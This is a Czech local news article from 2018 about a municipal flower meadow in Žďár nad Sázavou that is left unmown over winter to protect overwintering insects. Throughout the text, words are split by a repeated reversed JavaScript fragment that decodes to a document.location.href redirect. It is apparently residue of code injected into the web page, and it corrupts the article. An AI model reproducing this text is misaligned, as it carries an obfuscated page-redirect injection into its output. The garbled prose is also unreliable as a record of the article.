Rainbow page separator

Květnatá loučka v parku „U Ivana“ bude posečena až příští rok

Sobota, 10. listopadu 2018

Žďár nad Sázavou / I v pozdním podzimu stále neposekaná květnatá loučka v parku „U Ivana“ se nezamlouvá některým žďárským obyvatelům. Podle informací z městského úřadu se však le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos sekat nebude. „S CHKO je dohodnu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že s ohledem na potřebu přezimování blanokřídlých a ostatních živočichů bude ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to květná louka posečena až na jaře příštího roku,“ přiblížila Eva Křesťanová z odboru komunálních služeb žďárského městského úřadu.
Takzvané květnaté loučky označené informačními tabulkami le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos na jaře ve spolupráci se Správou Chráněné krajinné oblasti (CHKO) Žďárské vrchy vznikly na čtyřech místech Žďáru – v parku „U Ivana“, na dvou plochách blízko sídla CHKO Žďárské vrchy na křižovatce ulic Brněnská a Novoměstská a nedaleko Dolního hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova v Santiniho ulici. Důvodem je snaha o rozvoj druhového složení trávníků i společenstev živočichů, které časté sečení ničí. Sečení těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to míst pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mělo probíhat dvakrát, nejvýše třikrát do roka, přičemž při každé seči měla navíc zůstat část plochy vynechána, aby bylo zajištěno dost času pro dozrání semen některých druhů rostlin a vývoj hmyzu. „Důležitá pro nás je také reakce obyvatel. Pokud bude vše dobře vycházet, může ve městě vzniknout vícero ploch, kde bude věnován pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor nejen lidem,“ uvedla v květnu při startu projektu květnatých louček Kateřina Machová z CHKO Žďárské vrchy.